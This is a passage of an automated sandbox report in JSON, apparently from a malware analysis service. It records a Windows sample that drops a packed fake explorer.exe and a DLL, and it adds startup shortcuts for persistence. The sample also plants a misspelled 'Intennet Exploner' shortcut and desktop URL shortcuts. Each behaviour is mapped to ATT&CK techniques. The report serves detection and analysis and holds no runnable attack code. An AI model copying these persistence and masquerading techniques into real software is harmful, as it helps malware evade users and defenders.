\"explorer.exe\" writes file \"%commonprogramfiles%\\uiui8.dll\"\n \"explorer.exe\" writes file \"%allusersprofile%\\microsoft\\windows\\start menu\\programs\\startup\\1681.lnk\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-203", "type": 6, "relevance": 3, "name": "Tries to access LNK files (Windows shortcut)", "description": "\"explorer.exe\" trying to access LNK file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk\"\n \"explorer.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk\"\n \"explorer.exe\" trying to access LNK file \"C:\\Users\\Public\\Desktop\\Intennet Exploner.lnk\"\n \"explorer.exe\" trying to access LNK file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.LNK\"\n \"explorer.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.LNK\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"explorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\explorer.exe]- [targetUID: 00000000-00005848]\n \"uiui8.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\uiui8.dll]- [targetUID: 00000000-00005848]\n \"1681.lnk\" has type \"MS Windows shortcut Item id list present Has Working directory Archive ctime=Wed Jul 7 07:21:24 2010 mtime=Wed Jul 7 07:21:24 2010 atime=Wed Jul 7 07:21:24 2010 length=0 window=hide\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk]- [targetUID: 00000000-00005848]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A9C787.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"qdcrwv.txt\" has type \"MS Windows shortcut Item id list present Points to a file or directory Has Relative path Has Working directory Has command line arguments Archive ctime=Fri Jul 2 01:50:58 2010 mtime=Fri Jul 9 08:01:36 2010 atime=Tue Aug 17 12:00:00 2004 length=93184 window=hide\"- Location: [C:\\qdcrwv.txt]- [targetUID: 00000000-00005848]\n \"mfvqlr.bmp\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\"- Location: [C:\\mfvqlr.bmp]- [targetUID: 00000000-00005848]\n \"gbvxvm.jpg\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\"- Location: [C:\\gbvxvm.jpg]- [targetUID: 00000000-00005848]\n \"ttdmri.gif\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\"- Location: [C:\\ttdmri.gif]- [targetUID: 00000000-00005848]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\MFILES\\winlogon.exe]- [targetUID: 00000000-00005848]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"explorer.exe\" renamed original file\"C:\\qdcrwv.txt\" to \"%PUBLIC%\\Desktop\\Intennet Exploner.lnk\"\n \"explorer.exe\" renamed original file\"C:\\gbvxvm.jpg\" to \"%PUBLIC%\\Desktop\\¸Ä±äÄãµÄÒ»Éú.url\"\n \"explorer.exe\" renamed original file\"C:\\mfvqlr.bmp\" to \"%PUBLIC%\\Desktop\\ÌÔ±¦¹ºÎïA.url\"\n \"explorer.exe\" renamed original file\"C:\\ttdmri.gif\" to \"%PUBLIC%\\Desktop\\Ãâ·ÑµçÓ°C.url\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493712'}\" (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493832'}\" (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493872'}\" (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493792'}\" (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493456'}\" (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4493936'}\" (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"explorer.exe\" called \"FindResourceA\" with parameter \"4245084\" - (UID: 00000000-00005848)\n \"explorer.exe\" called \"FindResourceA\" with parameter \"4245112\" - (UID: 00000000-00005848)\n \"explorer.exe\" called \"FindResourceA\" with parameter \"4245132\" - (UID: 00000000-00005848)\n \"explorer.exe\" called \"FindResourceA\" with parameter \"4245152\" - (UID: 00000000-00005848)\n \"explorer.exe\" called \"FindResourceA\" with parameter \"4229372\" - (UID: 00000000-00005848)\n \"explorer.exe\" called \"FindResourceA\" with parameter \"4245464\" - (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero\n Raw size of \"BSS\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb0c76785c32000050fd7f9a5c1d7700f0fd7f70d512004450fd7f00000000400000003f0000001c0000000050fd7f64d51200c15c1d77608224771c0000000050fd7f9a5c1d7700f0fd7f88d5120057891c778083247713173175d8eb0c76 (UID: 00000000-00005784)\n \"explorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb0c76b8571e0000f0fd7f9a5c1d7700e0fd7f70d5120044f0fd7f00000000400000003f0000001c00000000f0fd7f64d51200c15c1d77608224771c00000000f0fd7f9a5c1d7700e0fd7f88d5120057891c778083247713173175d8eb0c76 (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"OpenMutexA\" with parameter \"b3f23ff8c59e64f9be486251e01e245a\" - (UID: 00000000-00005784)\n \"explorer.exe\" called \"OpenMutexA\" with parameter \"b3f23ff8c59e64f9be486251e01e245a\" - (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005784)\n \"explorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310074e91200b344e66a0d000000000000000000000000000000000000000000000000000000d00000000000000000000000000000008cf01200635d653230ee120030ee12005ecb3676d000000000000000005d34768cf012000e5d347624ec1200dcaa3876010000000000000082000000fffffffffffffffface91200780200000000000025000000ace912007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600af4f673204ea12006d82c07544e1310004010000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610032003000380064003500390062006400320032003600330035006200360063003300650065006600380063003400330034006400380030003500380039003400370066006400380063006200660038003600310035006400630065003200340061002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b1c7711c63977d8eb0c76ac012e0000002e0000000000000000000300ed00c3000000000000000000000000000000000000000400e800c3000000000000000000000008702e0000000000200000000000000000000000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340001000000ffffffff020000000800000080533200805332007b5332000000000002000000d8af310000000000010000080000000074fb120095e1187789003700feffffffece812003f08557502000000d8af3100000000000100001888fb5475dce81200c81c3876b2ea120095fb547510ea1200d8af310000000000000000000000000098e9120000002e007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600734f673258e912006d82c07544e1310004010000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310018e2310013e23100000000000000000000002e000000000164de120000000000c8eb120095e1187789003700feffffff435c1c7750591c77aa000000b800000012e2310010e23100ecdf120024e4120000000000000000000000000000000000000000000000000000000000000000001c5c1b7760d83075ffffffff170000009cdf120024000000030000008ce41200b8e9120024e4120086000000c8df120096ed1c773ae23100a06af27486000000ecdf120024e412000000000086008800a06af274ecdf1200916cf2743ae23100a06af274a06af2745ce4120002020000 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0074e91200b344e66a0d000000000000000000000000000000000000000000000000000000d00000000000000000000000000000008cf01200783f663630ee120030ee12005ecb3676d000000000000000005d34768cf012000e5d347624ec1200dcaa3876010000000000000082000000fffffffffffffffface91200780200000000000025000000ace912007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005774a13704ea12006d82c07554311e0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000043006f006d006d006f006e002000460069006c00650073005c004d006900630072006f0073006f006600740020005300680061007200650064005c006500780070006c006f007200650072002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b1c776cf53977d8eb0c76ac011a0000001a0000000000000000000300ed0084010000000000000000000000000000000000000400e80084010000000000000000000008701a0000000000200000000000000000000000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000200001000000ffffffff0200000008000000a0c01e00a0c01e009bc01e000000000002000000a0e81d0000000000010000080000000074fb120095e11877f4333700feffffffece812003f08557502000000a0e81d00000000000100001888fb5475dce81200c81c3876b2ea120095fb547510ea1200a0e81d0000000000000000000000000098e9120000001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008b74a13758e912006d82c07554311e0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000b8fa1d0050e8f801b344e66a81d03876000000000000000000000000000000000000000000000000a4010000000000000000000000000000b7754b3698318c370cedf8015ecb3676a401000000000000005d347668eff8010e5d347600ebf801dcaa3876010000000000000072000000ffffffffffffffff88e8f80178020000000000002500000088e8f8017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360073754b36e0e8f8016d82c075f4ba1e0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0001000000ffffffff0200000008000000c8bd1e00c8bd1e00c3bd1e000000000002000000a0e81d0000000000010000080000000050faf80195e11877f4333700feffffffc8e7f8013f08557502000000a0e81d00000000000100001888fb5475b8e7f801c81c38768ee9f80195fb5475ece8f801a0e81d0000000000000000000000000074e8f80100001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a7754b3634e8f8016d82c075f4ba1e0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000c0ca1f00f8e2f801b344e66a81d03876000000000000000000000000000000000000000000000000a00100000000000000000000000000004f7f4b36c0348c37b4e7f8015ecb3676a001000000000000005d347610eaf8010e5d3476a8e5f801dcaa3876010000000000000074000000ffffffffffffffff30e3f80178020000000000002500000030e3f8017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600db7e4b3688e3f8016d82c0752cc11d0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000800000000bf1e0000bf1e00fbbe1e000000000048c31d0000001a0008701a0102000000a0e81d000000000001000008f4333700feffffffbcc72477c0c724770a00000070e2f8013f08557502000000a0e81d00000000000100001888fb547560e2f801c81c387636e4f80195fb547594e3f801a0e81d000000000000000000000000001ce3f80100001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000f7f4b36dce2f8016d82c075b4c11d0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000a8c31f00a0ddf801b344e66a81d03876000000000000000000000000000000000000000000000000a0010000000000000000000000000000e7404b36280b8c375ce2f8015ecb3676a001000000000000005d3476b8e4f8010e5d347650e0f801dcaa3876010000000000000076000000ffffffffffffffffd8ddf801780200000000000025000000d8ddf8017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a3434b3630def8016d82c0751cc51d0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000800000088bf1e0088bf1e0083bf1e000000000038c71d0000001a0008701a0102000000a0e81d000000000001000008f4333700feffffffbcc72477c0c724770a00000018ddf8013f08557502000000a0e81d00000000000100001888fb547508ddf801c81c3876dedef80195fb54753cdef801a0e81d00000000000000000000000000c4ddf80100001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d7404b3684ddf8016d82c0751cc51d0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000120058daca01bcf4120080f4187600003e000000000089f41876e26ea1370200000030f512002cf5120060f512003cf51200b08b4400000000000000100080f41200c83a2276f4f41200d58c1a7630f51200c4f4120042a41876a802227604f51200d2f41876080000006ef5187644f518765a6fa13702000000ec3686750000130045488675d8f412000200000000001300ec36867508f5120042a41876a80222764cf51200c035867508000000953586759406593102000000ec368675000013004548867570daca0158daca0118f51200e0618875d8f512001ed8867540c6cd44 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000018ca1d00f8e2f801b344e66a81d03876000000000000000000000000000000000000000000000000c00100000000000000000000000000004f7f4b36c0348c37b4e7f8015ecb3676c001000000000000005d347610eaf8010e5d3476a8e5f801dcaa387601000000000000007a000000ffffffffffffffff30e3f80178020000000000002500000030e3f8017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600db7e4b3688e3f8016d82c07534cc1d0004010000 (UID: 00000000-00005848)\n \"explorer.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000050ce1d0000001a000020000010f01e00f0e2f80104641c7738011a00e0631c772cc3d3760000000000001a0018f01e000000000082281c77340000c01ce2f80116641c7750faf80150ce1d00d82f1a00feffffff00001a00d82f1a000200000082281c77d82f1a0002000002340000c0060100078d00000000001a00f8f41e000300000000001a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000f7f4b36dce2f8016d82c075f4f01e0004010000 (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"IsWow64Process\" with parameter \"5784\" - (UID: 00000000-00005784)\n \"explorer.exe\" called \"IsWow64Process\" with parameter \"5848\" - (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"explorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"explorer.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\EXPLORER.EXE\")\n \"explorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\EXPLORER.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"explorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindFirstFileA\" with parameter %COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindFirstFileW\" with parameter %COMMONPROGRAMFILES%\\Microsoft Shared\\*.* (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter ClickToRun (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter DAO (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter DW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter EQUATION (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter EURO (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Filters (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter GRPHFLT (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter ink (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter MSClientDataMgr (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter MSEnv (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter MSInfo (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter OFFICE14 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter OfficeSoftwareProtectionPlatform (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Portal (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter PROOF (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Smart Tag (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Source Engine (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter Stationery (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter TextConv (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"FindNextFileW\" with parameter THEMES14 (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"explorer.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"explorer.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"explorer.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"15\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"explorer.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005848)\n \"explorer.exe\" called an API 